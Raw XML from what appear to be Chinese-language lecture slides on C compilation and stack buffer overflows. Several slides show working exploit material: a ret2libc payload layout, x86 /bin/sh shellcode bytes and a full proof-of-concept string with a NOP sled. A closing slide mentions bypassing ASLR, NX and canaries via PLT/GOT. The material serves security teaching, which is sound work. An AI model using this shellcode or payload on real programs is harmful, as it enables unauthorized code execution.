            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0xf7f4de48</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pyload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=‘A’*22+system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任意地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>+bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:sym typeface="+mn-ea"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3406460" y="2217250"/>
            <a:ext cx="2609850" cy="1838325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302385" y="1196340"/>
            <a:ext cx="7879715" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Payload=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>*22+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跳转地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shellcod</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302385" y="4128770"/>
            <a:ext cx="9562465" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的机器码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe0\x50\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>\x50\xe8\xe3\xb7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>\xd3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"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sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="内容占位符 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919910" y="1194799"/>
            <a:ext cx="10532281" cy="4495765"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语言的编程过程，一个高级语言程序是从编写到打包、再到编译执行的基本过程，它需要经过在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上的一个翻译过程。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="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0719" y="2414969"/>
            <a:ext cx="10532282" cy="148110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154323" y="3896012"/>
            <a:ext cx="9250786" cy="2306955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>来实现上面的过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>预处理阶段：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      预处理器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cpp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）根据以字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>开头的命令修给原始的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>程序，结果得到另一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>程序，通常以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>作为文件扩展名。主要是进行文本替换、宏展开、删除注释这类简单工作。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对应的命令行有：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –E  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hello.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hello.i</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>编译阶段：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      将文本文件 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hello.i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>翻译成 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hello.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，包含相应的汇编语言程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对应的命令行有：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hello.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hello.s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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逆向分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302416" y="2659985"/>
            <a:ext cx="8934450" cy="2667000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302385" y="1019810"/>
            <a:ext cx="9309735" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最后测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>poc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:   'A'*22 + '\xd7\x84\x04\x08' + '\x90'*50 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe0\x50\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>\x50\xe8\xe3\xb7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>\xd3’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1299210" y="5458460"/>
            <a:ext cx="4775835" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>可以看到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>执行成功</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="240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总结</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1117600" y="1165860"/>
            <a:ext cx="10095865" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>      前面的实验，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>写入缓冲区、溢出缓冲区等方面来实现逆向分析。但是都基于，关闭了动态地址、栈不可执行、栈帧检测。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>但是即使开启了地址随机化、栈不可执行、栈帧检测，也可以用别的方法绕过。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当程序出现动态地址，但是程序内部的相对地址是固定的， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PLT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的地址还是确定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>此外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>got.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是有写入权限的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击者还可以通过代码中的内存破坏漏洞对 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
